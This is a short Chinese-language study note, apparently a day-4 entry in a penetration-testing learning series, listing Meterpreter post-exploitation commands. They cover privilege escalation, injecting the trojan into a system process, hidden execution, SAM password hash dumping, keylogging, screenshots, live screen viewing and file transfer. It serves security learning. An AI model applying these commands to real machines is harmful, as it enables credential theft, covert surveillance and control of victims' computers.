内网渗透 day4-meterpreter基本命令 – 作者:彩虹猛犸233

meterpreter基本命令

1.getuid 查看当前用户

2.getpid 查看当前的进程id

3.getsystem 初步提权

注意：这边是在win7使用管理员身份运行木马了，不然一般是不成功的。

4.ps 1.查看进程列表2.帮助我们获取pid进行进程迁移

5.migrate 7624 迁移  将木马进程注入系统进程中

这时候在输入ps查看就找不到4092进程了

6.shell 进入cmd环境（碰到乱码：chcp 65001 （utf-8））

7.execute 执行命令（常用execute -H -c -i -f cmd）

-H创建隐藏的进程

-c 信道化I/O(交互所需)

-i 创建流程后与之交互

-f 要运行的可执行命令

8.bg 返回控制台

9.sessions 查看会话

10.sessions -i id 进入会话

11.sessions -k id | sessions -K  指定删除会话|删除全部会话

12.jobs 查看工作

13.run -j | exploit -j 后台监听

win7点击木马文件后会话才会产生

14.run -z | exploit -z 持续监听

15.hashdump 下载sam表中的账户密码信息（需要管理员权限）

16.捕获键盘按击

keyscan_dump   Dump the keystroke buffer

keyscan_start  Start capturing keystrokes

keyscan_stop   Stop capturing keystrokes

17screenshot 截屏

18.run vnc | screenshare   实时查看对方电脑屏幕

19.pwd 当前目录位置

20.download 从远程主机中下载文件

21.upload 从远程主机中上传文件

来源：freebuf.com 2020-11-16 13:16:14 by: 彩虹猛犸233